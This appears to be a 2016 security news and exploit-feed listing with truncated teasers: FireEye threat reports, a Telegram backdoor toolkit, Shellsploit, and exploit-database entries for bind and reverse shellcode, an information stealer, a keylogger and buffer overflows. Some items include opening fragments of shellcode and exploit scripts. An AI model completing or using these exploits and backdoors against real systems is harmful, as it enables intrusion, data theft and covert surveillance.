APT Group Sends Spear Phishing Emails to Indian Government Officials

Introduction On May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and...

APT Group Sends Spear Phishing Emails to Indian Government Officials

Introduction On May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and...

Bt2 - Blaze Telegram Backdoor Toolkit

bt2 is a Python-based backdoor in form of a IM bot that uses the infrastructure and the feature-rich bot API provided by Telegram, slightly repurposing its communication platform to act as a C&C. Dependencies Telepot requests Installation $ sudo pip install telepot $ sudo pip install requests PS:...

Linux/x86-64 - XOR Encode execve Shellcode

/ Title : Linux x8664 XOR encode execve"/bin//sh","//bin/sh","-i",NULL,NULL shellcode Date : 31-05-2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 / / main code ------------------------ section .text global start start: xor rax,rax xor rdx,rdx push rax push rax mov...

Linux x86_64 XOR Encode execve Shellcode

Linux x8664 XOR Encode execve Shellcode. Shellcode exploit for linx86-64 platform / Title : Linux x8664 XOR encode execve"/bin//sh","//bin/sh","-i",NULL,NULL shellcode Date : 31-05-2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 / / main code ------------------------...

Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)

// Title: Linux X86 Bind TCP:4444 656 bytes // Author: Brandon Dennis // Contact: email protected // Date: 5/24/2016 // ASM Source: https://github.com/slyth11907/x86-ASM-Linux-Intel/blob/master/Code-Examples/ShellCode/execve-stack-bind.asm / ; Filename: execve-stack-bind.asm ; Author: Brandon...

Shellsploit - New Generation Exploit Development Kit

Shellsploit let's you generate customized shellcodes, backdoors, injectors for various operating system. And let's you obfuscation every byte via encoders. Install/Uninstall If you want to use Shellsploit, you have to install Capstone first. For the Capstone's installation: root$ sudo pip install...

Linux/x86-64 - Information Stealer Shellcode (399 bytes)

/ Title : Linux x8664 information stealer Date : 23-05-2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 Contact : email protected / / How does this shellcode works ----------------------------------- 1. First it connects to the information reciver 2. then it download a sh...

Linux x86_64 Information Stealer Shellcode

Linux x8664 Information Stealer Shellcode. Shellcode exploit for linx86-64 platform / Title : Linux x8664 information stealer Date : 23-05-2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 Contact : [email protected] / / How does this shellcode works...

Cisco ASA Software 8.x9.x - IKEv1 IKEv2 Buffer Overflow

Cisco ASA Software 8.x9.x - IKEv1 IKEv2 Buffer Overflow !/usr/bin/env python2.7 import socket import sys import struct import string import random import time Spawns a reverse cisco CLI cliShellcode = "\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"...

Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)

/===================================================================/ / Filename: bindshell.c Author: JollyFrogs email protected License: This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. Compile: gcc -m32 -fno-stack-protector -z execstack...

CVE-2016-4117: Flash Zero-Day Exploited in the Wild

On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player CVE-2016-4117 and reported the issue to the Adobe Product Security Incident Response Team PSIRT. Adobe released a patch for the vulnerability in APSB16-15 just four days later. Attackers...

NRSS Reader 0.3.9 - Local Stack Overflow

NRSS Reader 0.3.9 - Local Stack Overflow Exploit developed using Exploit Pack v5.4 Exploit Author: Juan Sacco - http://www.exploitpack.com - [email protected] Program affected: NRSS RSS Reader Version: 0.3.9-1 Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org Program...

Windows/x86 - Functional Keylogger to File Null Free Shellcode 601 bytes

/ ; Exploit Title: All windows null free shellcode - functional keylogger to file - 601 0x0259 bytes ; Date: Sat May 7 19:32:08 GMT 2016 ; Exploit Author: Fugu ; Vendor Homepage: www.microsoft.com ; Version: all afaik ; Tested on: Win7 im guessing it will work on others ; Note: it will write to...

i.FTP 2.21 - Host Address URL Field (SEH)

i.FTP 2.21 - Host Address URL Field SEH !/usr/bin/python Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit Date: 3-5-2016 Exploit Author: Tantaryu MING Vendor Homepage: http://www.memecode.com/iftp.php Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe Version: 2.21...

i.FTP 2.21 - Host Address / URL Field (SEH)

!/usr/bin/python Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit Date: 3-5-2016 Exploit Author: Tantaryu MING Vendor Homepage: http://www.memecode.com/iftp.php Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe Version: 2.21 Tested on: Windows 7 SP1 x8664 How to...

Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)

/ Title : Linux x8664 bind tcp : port 1472 ipv6 Date : 02/05/2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 Contact : email protected / / section .text global start start: ;;socket xor rax,rax push 6 push 0x1 push 10 pop rdi pop rsi pop rdx mov al,41 ;socket syscall...

TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow

TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow Exploit developed using Exploit Pack v5.4 Exploit Author: Juan Sacco - http://www.exploitpack.com - [email protected] Program affected: Threaded USENET news reader Version: 3.6-23 Tested and developed under: Kali Linux 2.0 x86 -...

TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow

Exploit for linux platform in category local exploits Exploit developed using Exploit Pack v5.4 Exploit Author: Juan Sacco - http://www.exploitpack.com - email protected Program affected: Threaded USENET news reader Version: 3.6-23 Tested and developed under: Kali Linux 2.0 x86 -...

Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)

/ Title : Linux x8664 reverse tcp ipv6 Date : 04-05-2016 Author : Roziul Hasan Khan Shifat Tested on : Ubuntu 14.04 LTS x8664 / / Disassembly of section .text: 0000000000400080 : 400080: 48 31 c0 xor rax,rax 400083: 6a 06 push 0x6 400085: 6a 01 push 0x1 400087: 6a 0a push 0xa 400089: 5f pop rdi...